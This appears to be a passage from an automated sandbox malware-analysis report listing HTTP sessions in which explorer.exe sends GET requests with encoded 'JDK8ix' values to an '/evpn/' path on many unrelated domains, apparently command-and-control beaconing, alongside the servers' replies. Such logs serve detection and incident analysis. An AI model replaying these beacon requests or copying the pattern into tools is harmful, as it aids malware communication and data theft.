                                                                        Data Ascii: ...top.location="http://www.jamessicilia.com/?fp=csMmVs%2F%2BKvHN4RPrdo5yUNu%2FaNbtxdJciSZCMiziJI1RzaFEhI4Z5eRmvj1JVCfI5xcdJaGDXoC3YgbFujzELkmBgV%2FvgcqyEcVuMDb43NU1KNZnjOjt6yS6yL2NQCRB8dbJySQOcoyOm3Lg%2Bv2y9dHjXCxUQXP86YDpQRogP4Y%3D&prvtof=dcaUoSL1QM06n8ST7rcIFyTahhUC61rKW2gcvfUvGH4%3D&poru=4PHHs34DjSgzjf1Avxst06L0%2Bb6v9DrHta3BhgX9AC0V9JDT3tXRkggSDReSral8Xbw75Zv7vtC37fENbEnJ%2F7XnBcLvh3wbjvbar7a0W%2F7wnfbEbAPWjlQftZlkv%2BvQzCBwFjJl37ic7uH4V%2FftpZCI9LeeAMUjG%2BjNogqmqeJmv9KoSH0J%2FMhjP6ecuo3M&cifr=1&JDK8ix=fhrZBjxaI0WDrOMMLB9i%2FeTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEA
                                                                        Apr 8, 2021 11:10:00.582726002 CEST | 1372 | IN | Data Raw: 41 51 3d 3d 5f 52 75 31 66 44 38 32 2f 59 71 73 2b 33 5a 79 65 37 64 74 58 55 5a 2f 6f 4a 69 44 77 32 75 31 4f 78 50 67 48 4d 38 78 43 79 4c 59 79 57 61 54 4d 47 43 57 51 69 64 7a 4d 2b 41 38 36 4c 37 6f 73 37 75 48 70 6b 64 36 4a 34 42 4c 6d 73
                                                                        Data Ascii: AQ==_Ru1fD82/Yqs+3Zye7dtXUZ/oJiDw2u1OxPgHM8xCyLYyWaTMGCWQidzM+A86L7os7uHpkd6J4BLmsTmMgA8SfQ=="><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width"><meta ht
                                                                        Apr 8, 2021 11:10:00.582946062 CEST | 1372 | IN | Data Raw: 32 42 76 32 79 39 64 48 6a 58 43 78 55 51 58 50 38 36 59 44 70 51 52 6f 67 50 34 59 25 33 44 26 70 72 76 74 6f 66 3d 64 6a 46 41 38 68 64 59 64 78 56 52 37 64 72 25 32 42 34 71 51 36 41 69 25 32 42 4b 7a 44 43 4a 53 61 4a 50 75 50 7a 79 4c 4f 6e
                                                                        Data Ascii: 2Bv2y9dHjXCxUQXP86YDpQRogP4Y%3D&prvtof=djFA8hdYdxVR7dr%2B4qQ6Ai%2BKzDCJSaJPuPzyLOnSIM4%3D&poru=oAQe3Y1XSeo0UqllFwmgg%2Fdjf2BSR1FA%2FyNyqCDOXzNfh5I7wYiIimAj25fYJnMumUpgfO%2FGXlEYFXrLrHKCsGrABIHQIGEWpjl4cTQ090eA2rSpviTChWkMxz0D1I5PfX5NRj2gdLxkEY
                                                                        Apr 8, 2021 11:10:00.650544882 CEST | 1373 | IN | Data Raw: 32 42 76 32 79 39 64 48 6a 58 43 78 55 51 58 50 38 36 59 44 70 51 52 6f 67 50 34 59 25 33 44 26 70 72 76 74 6f 66 3d 64 6a 46 41 38 68 64 59 64 78 56 52 37 64 72 25 32 42 34 71 51 36 41 69 25 32 42 4b 7a 44 43 4a 53 61 4a 50 75 50 7a 79 4c 4f 6e
                                                                        Data Ascii: 2Bv2y9dHjXCxUQXP86YDpQRogP4Y%3D&prvtof=djFA8hdYdxVR7dr%2B4qQ6Ai%2BKzDCJSaJPuPzyLOnSIM4%3D&poru=oAQe3Y1XSeo0UqllFwmgg%2Fdjf2BSR1FA%2FyNyqCDOXzNfh5I7wYiIimAj25fYJnMumUpgfO%2FGXlEYFXrLrHKCsGrABIHQIGEWpjl4cTQ090eA2rSpviTChWkMxz0D1I5PfX5NRj2gdLxkEY


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        1 | 192.168.2.3 | 49727 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 11:10:05.937941074 CEST | 1395 | OUT | GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.kinfet.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:06.077676058 CEST | 1396 | IN | HTTP/1.1 403 Forbidden
                                                                        Date: Thu, 08 Apr 2021 09:10:06 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        X-Sorting-Hat-PodId: -1
                                                                        X-Dc: gcp-us-east1
                                                                        X-Request-ID: da345f65-3dc9-46ad-8b16-fd94fcfb308a
                                                                        Set-Cookie: _shopify_fs=2021-04-08T09%3A10%3A06Z; Expires=Fri, 08-Apr-22 09:10:06 GMT; Domain=kinfet.com; Path=/; SameSite=Lax
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-Download-Options: noopen
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 095258057e0000cc5abf907000000001
                                                                        Server: cloudflare
                                                                        CF-RAY: 63ca5c4f2f01cc5a-ZRH
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4r
                                                                        Apr 8, 2021 11:10:06.077707052 CEST | 1398 | IN | Data Raw: 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d
                                                                        Data Ascii: em 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1
                                                                        Apr 8, 2021 11:10:06.077727079 CEST | 1399 | IN | Data Raw: 20 22 70 74 2d 42 52 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 65 73 73 6f 20 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 56 6f 63 c3 aa 20 6e c3 a3 6f 20 74 65 6d 20 70 65 72
                                                                        Data Ascii: "pt-BR": { "title": "Acesso negado", "content-title": "Você não tem permissão para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta página web" }, "k
                                                                        Apr 8, 2021 11:10:06.077747107 CEST | 1400 | IN | Data Raw: 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 77 65 62 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 68 69 22 3a 20 7b
                                                                        Data Ascii: content-title": "You do not have permission to access this website" }, "hi": { "title": " ", "content-title": "
                                                                        Apr 8, 2021 11:10:06.077764034 CEST | 1401 | IN | Data Raw: 20 3c 3d 20 31 30 0a 20 20 20 20 22 65 6e 22 3b 0a 20 20 6c 61 6e 67 75 61 67 65 20 3d 20 6c 61 6e 67 75 61 67 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3b 20 2f 2f 20 53 74 72 69 70 20 63 6f 75 6e 74 72 79 20 63 6f 64 65 0a 20 20 74 72 61 6e
                                                                        Data Ascii: <= 10 "en"; language = language.split("-")[0]; // Strip country code translations = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]");
                                                                        Apr 8, 2021 11:10:06.077776909 CEST | 1401 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        10 | 192.168.2.3 | 49744 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 11:11:04.175527096 CEST | 5167 | OUT | GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.curiosityisthecurebook.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:04.291693926 CEST | 5167 | IN | HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 09:11:04 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "6063a886-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        11 | 192.168.2.3 | 49745 | 192.185.48.194 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 11:11:09.627645969 CEST | 5168 | OUT | GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.usinggroovefunnels.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:09.776088953 CEST | 5169 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 08 Apr 2021 09:11:09 GMT
                                                                        Server: Apache
                                                                        Location: http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu
                                                                        Content-Length: 326
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&amp;w4=jFNp36Ihu">here</a>.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        12 | 192.168.2.3 | 49746 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 11:11:14.840365887 CEST | 5170 | OUT | GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.cgpizza.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:14.966414928 CEST | 5170 | IN | HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 09:11:14 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "606abe1d-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49747 | 52.58.78.16 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:11:20.052567959 CEST | 5171 | OUT | GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1
Host: www.physicalrobot.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 8, 2021 11:11:20.070189953 CEST | 5172 | IN | HTTP/1.1 410 Gone
Server: openresty/1.13.6.2
Date: Thu, 08 Apr 2021 09:10:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 7<html>9 <head>51 <meta http-equiv='refresh' content='5; url=http://www.physicalrobot.com/' />a </head>9 <body>3d You are being redirected to http://www.physicalrobot.coma </body>8</html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.3 | 49748 | 208.91.197.91 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:11:25.228843927 CEST | 5172 | OUT | GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1
Host: www.jamessicilia.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 8, 2021 11:11:25.415476084 CEST | 5174 | IN | HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 09:11:25 GMT
Server: Apache
Set-Cookie: vsid=928vr3654186853404344; expires=Tue, 07-Apr-2026 09:11:25 GMT; Max-Age=157680000; path=/; domain=www.jamessicilia.com; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Ru1fD82/Yqs+3Zye7dtXUZ/oJiDw2u1OxPgHM8xCyLYyWaTMGCWQidzM+A86L7os7uHpkd6J4BLmsTmMgA8SfQ==
Content-Length: 2565
Keep-Alive: timeout=5, max=123
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Ascii: ...top.location="http://www.jamessicilia.com/?fp=xiw7azCzKz1%2BXVVj2lgkK%2BemjZYd4f8F1YHudC4CBU2W%2FBcL9X8%2BRXqi4uaDRDzqEMVKC2adjYszRY53zDcB2cFJ107GDMDrJAROK0EoqUdrH6EfNO77ec4KStV7QOj9XrlxfOhliIx%2BMfALJ6Iekk%2BchDhW2SGsyYuPRnPlo%2Fk%3D&prvtof=CdhgCFl6KwdbWl9rZljIZIJGZxb6cdp0Hg%2FnSVrWLLY%3D&poru=MRcv008CmOPR47eUZFo%2BAQyIVoGxWQgMueZQO0LXswpNFIzcG89UfhctA7vte8ZkFTxfBNr8p%2B7eEZDjNEOOHWFxPTfv0Lfu%2BaYTzhJhcXXF%2BmWdcsQJ8rgMI3I5iwnoJ7XRD0pz3OWHvnKezUudTwEChHnKecMuQwq5wwSbFCCTsum3g09QLlRdKSOEnnny&cifr=1&JDK8ix=fhrZBjxaI0WDrOMMLB9i%2FeTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwE
Apr 8, 2021 11:11:25.415529013 CEST | 5175 | IN | Data Raw: (hex omitted)
Data Ascii: AAQ==_Ru1fD82/Yqs+3Zye7dtXUZ/oJiDw2u1OxPgHM8xCyLYyWaTMGCWQidzM+A86L7os7uHpkd6J4BLmsTmMgA8SfQ=="><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width"><meta h
Apr 8, 2021 11:11:25.415555954 CEST | 5176 | IN | Data Raw: (hex omitted)
Data Ascii: 2BMfALJ6Iekk%2BchDhW2SGsyYuPRnPlo%2Fk%3D&prvtof=K2L6KsMJ8opJ0oBdA3kKF8hbUhgXopCHN%2Fg6BqMmqWQ%3D&poru=RZvjpJIKQ4qwx1%2BpawRJAGSfw3rk1RhB9hZlcu5WLRHdhio6e6RiHSzAv0rvoungdK5Ti6tuxfsZClc9csUeRzxRaR7LQzhx%2F0f0%2BvUdzwuNTbWj2fd%2F1e7GZXtmxyBd8%2BG
Apr 8, 2021 11:11:25.466644049 CEST | 5176 | IN | Data Raw: (hex omitted)
Data Ascii: 2BMfALJ6Iekk%2BchDhW2SGsyYuPRnPlo%2Fk%3D&prvtof=K2L6KsMJ8opJ0oBdA3kKF8hbUhgXopCHN%2Fg6BqMmqWQ%3D&poru=RZvjpJIKQ4qwx1%2BpawRJAGSfw3rk1RhB9hZlcu5WLRHdhio6e6RiHSzAv0rvoungdK5Ti6tuxfsZClc9csUeRzxRaR7LQzhx%2F0f0%2BvUdzwuNTbWj2fd%2F1e7GZXtmxyBd8%2BG


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49749 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:11:30.437684059 CEST | 5177 | OUT | GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1
Host: www.kinfet.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 8, 2021 11:11:30.573548079 CEST | 5178 | IN | HTTP/1.1 403 Forbidden
Date: Thu, 08 Apr 2021 09:11:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Sorting-Hat-PodId: -1
X-Dc: gcp-us-east1
X-Request-ID: be2a510c-ab66-4b1d-9209-9129da9b5271
Set-Cookie: _shopify_fs=2021-04-08T09%3A11%3A30Z; Expires=Fri, 08-Apr-22 09:11:30 GMT; Domain=kinfet.com; Path=/; SameSite=Lax
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 1; mode=block
X-Download-Options: noopen
CF-Cache-Status: DYNAMIC
cf-request-id: 0952594f8f000023f7b5019000000001
Server: cloudflare
CF-RAY: 63ca5e5f4d0b23f7-ZRH
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4r
Apr 8, 2021 11:11:30.573568106 CEST | 5180 | IN | Data Raw: (hex omitted)
Data Ascii: em 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1
Apr 8, 2021 11:11:30.573580027 CEST | 5181 | IN | Data Raw: (hex omitted)
Data Ascii: "pt-BR": { "title": "Acesso negado", "content-title": "Você não tem permissão para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta página web" }, "k
Apr 8, 2021 11:11:30.573599100 CEST | 5182 | IN | Data Raw: (hex omitted)
Data Ascii: content-title": "You do not have permission to access this website" }, "hi": { "title": " ", "content-title": "
Apr 8, 2021 11:11:30.573612928 CEST | 5183 | IN | Data Raw: (hex omitted)
Data Ascii: <= 10 "en"; language = language.split("-")[0]; // Strip country code translations = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]");
Apr 8, 2021 11:11:30.573626995 CEST | 5183 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49728 | 45.82.188.40 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:10:11.923106909 CEST | 1402 | OUT | GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1
Host: www.productsoffholland.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 8, 2021 11:10:11.952156067 CEST | 1403 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Type: text/html
Content-Length: 706
Date: Thu, 08 Apr 2021 09:10:11 GMT
Server: LiteSpeed
Location: https://www.productsoffholland.com/evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu
X-Powered-By: PleskLin
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49729 | 35.240.239.44 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:10:17.300426006 CEST | 1404 | OUT | GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1
Host: www.markmalls.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 8, 2021 11:10:17.568883896 CEST | 1405 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 08 Apr 2021 09:10:17 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.markmalls.com/evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49731 | 52.15.160.167 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:10:22.820638895 CEST | 1472 | OUT | GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1
Host: www.zhuledao.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 8, 2021 11:10:22.931658030 CEST | 1474 | IN | HTTP/1.1 404 Not Found
Date: Thu, 08 Apr 2021 09:10:22 GMT
Content-Type: text/html
Content-Length: 153
Connection: close
Server: nginx/1.16.1
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49737 | 52.216.152.43 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 11:10:28.155589104 CEST | 5110 | OUT | GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1
Host: www.jcernadas.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 8, 2021 11:10:28.264857054 CEST | 5111 | IN | HTTP/1.1 301 Moved Permanently
x-amz-id-2: srg1ay+sKorhhQOGuNMizeaej2IzVeRVjl1MFuHTKFT1bmsVZFO6RdEeFj/WVvZumv+oGef+d2U=
x-amz-request-id: J17M5QFC7RV0ZT9A
Date: Thu, 08 Apr 2021 09:10:29 GMT
Location: http://jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu
Content-Length: 0
Server: AmazonS3
Connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        6 | 192.168.2.3 | 49738 | 198.185.159.144 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 11:10:38.489486933 CEST | 5112 | OUT | GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.theholisticbirthco.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:38.605370045 CEST | 5114 | IN | HTTP/1.1 400 Bad Request
                                                                        Cache-Control: no-cache, must-revalidate
                                                                        Content-Length: 77564
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Date: Thu, 08 Apr 2021 09:10:38 UTC
                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                        Pragma: no-cache
                                                                        Server: Squarespace
                                                                        X-Contextid: yF5waueG/2beIt67k
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        7 | 192.168.2.3 | 49739 | 80.67.16.8 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 11:10:48.780775070 CEST | 5144 | OUT | GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.tor-one.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:48.808635950 CEST | 5144 | IN | HTTP/1.1 302 Moved Temporarily
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 09:10:48 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 154
                                                                        Connection: close
                                                                        Location: http://leere.seite
                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        8 | 192.168.2.3 | 49740 | 188.93.150.75 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
